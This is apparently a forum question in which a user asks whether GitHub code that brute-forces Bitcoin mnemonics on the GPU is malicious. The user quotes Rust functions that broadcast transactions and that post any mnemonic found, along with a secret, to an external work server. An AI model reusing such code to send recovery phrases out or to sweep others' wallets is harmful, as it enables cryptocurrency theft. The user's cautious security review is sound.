Is this code potentially malicious? Could it drain a Bitcoin account if a valid mnemonic is found?

[alamiali12]

I found a piece of code on GitHub that leverages GPU using OpenCL to brute-force Bitcoin mnemonics. However, I'm concerned about its safety. Specifically, I noticed that the code includes sections that broadcast transactions and send recovery phrases (mnemonics) to an external server. Here are the parts I'm worried about:

1. Transaction broadcasting:

   fn broadcast_tx(rawtx: String) {
     let mut json_body = HashMap::new();
     json_body.insert("tx", rawtx);
     let client = reqwest::blocking::Client::new();
     let _res = client.post("https://api.blockcypher.com/v1/btc/main/txs/push").json(&json_body).send();
   }

2. Sending recovery phrases to an external server:

   fn log_solution(offset: u128, mnemonic: String) {
     let mut json_body = HashMap::new();
     json_body.insert("mnemonic", mnemonic);
     json_body.insert("offset", offset.to_string());
     json_body.insert("secret", WORK_SERVER_SECRET.to_string());
     let client = reqwest::blocking::Client::new();
     let _res = client.post(&format!("{}/mnemonic", WORK_SERVER_URL.to_string()).to_string()).json(&json_body).send();
   }

My questions are:

• Could this code drain a Bitcoin account if a valid mnemonic is found, especially with the broadcast_tx function?
• Why does the code send the recovery phrase (mnemonic) to an external server? Can this lead to compromising the security of the wallet?
• Is there a legitimate purpose for these external calls, or should they be removed to prevent potential security risks?

I'd appreciate your clarification on whether this code is safe to use as-is or if it requires modifications to avoid malicious behavior.